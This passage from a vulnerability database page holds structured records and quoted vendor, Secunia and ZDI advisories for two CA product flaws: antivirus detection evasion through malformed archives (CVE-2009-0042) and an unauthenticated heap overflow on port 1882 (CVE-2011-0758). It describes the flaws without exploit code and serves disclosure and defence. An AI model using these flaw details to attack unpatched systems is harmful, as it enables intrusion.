"cpe23Uri": "cpe:2.3:a:broadcom:network_and_systems_management:r11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:network_and_systems_management:r11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2009-0042"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Thierry Zoller and Sergio Alvarez of n.runs AG",
"sources": [
{
"db": "BID",
"id": "33464"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
],
"trust": 0.9
},
"cve": "CVE-2009-0042",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2009-0042",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-37488",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2009-0042",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200901-407",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-37488",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-37488"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "NVD",
"id": "CVE-2009-0042"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple unspecified vulnerabilities in the Arclib library (arclib.dll) before 7.3.0.15 in the CA Anti-Virus engine for CA Anti-Virus for the Enterprise 7.1, r8, and r8.1; Anti-Virus 2007 v8 and 2008; Internet Security Suite 2007 v3 and 2008; and other CA products allow remote attackers to bypass virus detection via a malformed archive file. Computer Associates Anti-Virus engine is prone to multiple vulnerabilities that may allow certain compressed archives to bypass the scan engine. \nSuccessful exploits will allow attackers to distribute files containing malicious code that the antivirus engine will fail to detect. \nProducts with \u0027arclib.dll\u0027 prior to version 7.3.0.15 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nTitle: CA20090126-01: CA Anti-Virus Engine Detection Evasion \nMultiple Vulnerabilities\n\n\nCA Advisory Reference: CA20090126-01\n\n\nCA Advisory Date: 2009-01-26\n\n\nReported By:\nThierry Zoller and Sergio Alvarez of n.runs AG\n\n\nImpact: A remote attacker can evade detection. CA has \nreleased a new Anti-Virus engine to address the vulnerabilities. \nConsequently, detection evasion can be a concern for gateway \nanti-virus software if archives are not scanned, but the risk is \neffectively mitigated by the desktop anti-virus engine. \n\n\nMitigating Factors: See note above. \n\n\nSeverity: CA has given these vulnerabilities a Low risk rating. If your product is \nconfigured for automatic updates, you should already be protected, \nand you need to take no action. If your product is not configured \nfor automatic updates, then you simply need to run the update \nutility included with your product. \n\n\nHow to determine if you are affected:\n\nFor products on Windows:\n\n1. Using Windows Explorer, locate the file \"arclib.dll\". By \n default, the file is located in the \n \"C:\\Program Files\\CA\\SharedComponents\\ScanEngine\" directory (*). \n2. Right click on the file and select Properties. \n3. Select the Version tab. \n4. \n\nFile Name File Version\narclib.dll 7.3.0.15\n\n*For eTrust Intrusion Detection 2.0 the file is located in \n\"Program Files\\eTrust\\Intrusion Detection\\Common\", and for eTrust \nIntrusion Detection 3.0 and 3.0 sp1, the file is located in \n\"Program Files\\CA\\Intrusion Detection\\Common\". \n\nFor CA Anti-Virus r8.1 on non-Windows platforms:\n\nUse the compver utility provided on the CD to determine the \nversion of Arclib. \n\nExample compver utility output:\n ------------------------------------------------\n COMPONENT NAME VERSION\n ------------------------------------------------\n eTrust Antivirus Arclib Archive Library 7.3.0.15\n ... (followed by other components)\n\nFor reference, the following are file names for arclib on \nnon-Windows operating systems:\n\nOperating System File name\nSolaris libarclib.so\nLinux libarclib.so\nMac OS X arclib.bundle\n\n\nWorkaround: \nDo not open email attachments or download files from untrusted \nsources. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your \nfindings to the CA Product Vulnerability Response Team. \nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1777\n82\n\n\nRegards,\nKen Williams, Director ; 0xE2941985\nCA Product Vulnerability Response Team\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2009 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.9.1 (Build 287)\nCharset: utf-8\n\nwj8DBQFJfyMKeSWR3+KUGYURAkyRAJ94Db9OT0mSDBo8UiSAK7AWWt5XSgCfc89J\nSlKLxRwfw06DmTk2tmlcrJI=\n=Kjse\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2009-0042"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "BID",
"id": "33464"
},
{
"db": "VULHUB",
"id": "VHN-37488"
},
{
"db": "PACKETSTORM",
"id": "74367"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2009-0042",
"trust": 2.9
},
{
"db": "BID",
"id": "33464",
"trust": 2.8
},
{
"db": "SECTRACK",
"id": "1021639",
"trust": 2.5
},
{
"db": "VUPEN",
"id": "ADV-2009-0270",
"trust": 2.5
},
{
"db": "XF",
"id": "48261",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "74367",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-37488",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-37488"
},
{
"db": "BID",
"id": "33464"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "PACKETSTORM",
"id": "74367"
},
{
"db": "NVD",
"id": "CVE-2009-0042"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
]
},
"id": "VAR-200901-0282",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-37488"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:46:26Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "197601",
"trust": 0.8,
"url": "http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=197601"
},
{
"title": "Computer Associates Anti-Virus Engine Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146829"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-noinfo",
"trust": 0.8
},
{
"problemtype": "CWE-DesignError",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "NVD",
"id": "CVE-2009-0042"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/33464"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1021639"
},
{
"trust": 2.5,
"url": "http://www.vupen.com/english/advisories/2009/0270"
},
{
"trust": 2.0,
"url": "http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=197601"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/500417/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://community.ca.com/blogs/casecurityresponseblog/archive/2009/01/26/ca20090126-01-ca-anti-virus-engine-detection-evasion-multiple-vulnerabilities.aspx"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/48261"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0042"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/48261"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-0042"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/500417"
},
{
"trust": 0.3,
"url": "/archive/1/503447"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-0042"
},
{
"trust": 0.1,
"url": "http://www.nruns.com/"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=1777"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://secdev.zoller.lu"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://support.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=1976"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-37488"
},
{
"db": "BID",
"id": "33464"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "PACKETSTORM",
"id": "74367"
},
{
"db": "NVD",
"id": "CVE-2009-0042"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-37488"
},
{
"db": "BID",
"id": "33464"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "PACKETSTORM",
"id": "74367"
},
{
"db": "NVD",
"id": "CVE-2009-0042"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-01-28T00:00:00",
"db": "VULHUB",
"id": "VHN-37488"
},
{
"date": "2009-01-27T00:00:00",
"db": "BID",
"id": "33464"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"date": "2009-01-28T00:18:02",
"db": "PACKETSTORM",
"id": "74367"
},
{
"date": "2009-01-28T01:30:00.453000",
"db": "NVD",
"id": "CVE-2009-0042"
},
{
"date": "2009-01-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-30T00:00:00",
"db": "VULHUB",
"id": "VHN-37488"
},
{
"date": "2009-05-12T22:06:00",
"db": "BID",
"id": "33464"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"date": "2021-04-09T18:53:02.657000",
"db": "NVD",
"id": "CVE-2009-0042"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "74367"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural CA Product Arclib library Vulnerabilities that can bypass virus detection",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "design error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
],
"trust": 0.6
}
}
VAR-201102-0158
Vulnerability from variot - Updated: 2023-12-18 12:45The eCS component (ECSQdmn.exe) in CA ETrust Secure Content Manager 8.0 and CA Gateway Security 8.1 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a crafted request to port 1882, involving an incorrect integer calculation and a heap-based buffer overflow. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust Secure Content Manager. Authentication is not required to exploit this vulnerability.The specific flaw exists in the eTrust Common Services Transport (ECSQdmn.exe) running on port 1882. When making a request to this service a user supplied DWORD value is used in a memory copy operation. Due to the lack of bounds checking an integer can be improperly calculated leading to a heap overflow. If successfully exploited this vulnerability will result in a remote system compromise with SYSTEM credentials. Failed exploit attempts will result in a denial-of-service condition. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/
TITLE: CA Secure Content Manager Common Services Transport Vulnerability
SECUNIA ADVISORY ID: SA43200
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43200/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43200
RELEASE DATE: 2011-02-10
DISCUSS ADVISORY: http://secunia.com/advisories/43200/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/43200/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43200
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in CA Secure Content Manager, which can be exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to missing input validation in the eTrust Common Services Transport (ECSQdmn.exe) service when parsing requests and can be exploited to cause a heap-based buffer overflow via a specially crafted request sent to port 1882. * CA Gateway Security version 8.1.
SOLUTION: Restrict access to the affected service.
PROVIDED AND/OR DISCOVERED BY: Sebastian Apelt via ZDI.
ORIGINAL ADVISORY: ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-059/
CA: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={EE6F16E1-6E05-4890-A739-2B9F745C721F}
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. ZDI-11-059: CA ETrust Secure Content Manager Common Services Transport Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-059
February 7, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. To view mitigations for this vulnerability please see: http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ca
-- CVE ID: CVE-2011-0758
-- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)
-- Affected Vendors: CA
-- Affected Products: CA eTrust Secure Content Manager
-- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6184. Authentication is not required to exploit this vulnerability.
-- Disclosure Timeline: 2008-05-23 - Vulnerability reported to vendor 2011-02-07 - Public release of advisory
-- Credit: This vulnerability was discovered by: * Sebastian Apelt (sebastian.apelt@siberas.de)
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201102-0158",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 2.4,
"vendor": "ca",
"version": "8.0"
},
{
"model": "gateway security",
"scope": "eq",
"trust": 2.4,
"vendor": "ca",
"version": "8.1"
},
{
"model": "etrust secure content manager",
"scope": null,
"trust": 0.7,
"vendor": "ca",
"version": null
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "BID",
"id": "46253"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "NVD",
"id": "CVE-2011-0758"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:gateway_security:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-0758"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sebastian Apelt (sebastian.apelt@siberas.de)",
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-059"
}
],
"trust": 0.7
},
"cve": "CVE-2011-0758",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2011-0758",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 1.5,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-48703",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-0758",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "CVE-2011-0758",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201102-129",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-48703",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "VULHUB",
"id": "VHN-48703"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "NVD",
"id": "CVE-2011-0758"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The eCS component (ECSQdmn.exe) in CA ETrust Secure Content Manager 8.0 and CA Gateway Security 8.1 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a crafted request to port 1882, involving an incorrect integer calculation and a heap-based buffer overflow. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust Secure Content Manager. Authentication is not required to exploit this vulnerability.The specific flaw exists in the eTrust Common Services Transport (ECSQdmn.exe) running on port 1882. When making a request to this service a user supplied DWORD value is used in a memory copy operation. Due to the lack of bounds checking an integer can be improperly calculated leading to a heap overflow. If successfully exploited this vulnerability will result in a remote system compromise with SYSTEM credentials. Failed exploit attempts will result in a denial-of-service condition. ----------------------------------------------------------------------\n\n\nGet a tax break on purchases of Secunia Solutions!\n\nIf you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:\nhttp://secunia.com/products/corporate/vim/section_179/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Secure Content Manager Common Services Transport Vulnerability\n\nSECUNIA ADVISORY ID:\nSA43200\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/43200/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43200\n\nRELEASE DATE:\n2011-02-10\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/43200/#comments\n\nAVAILABLE ON SITE AND 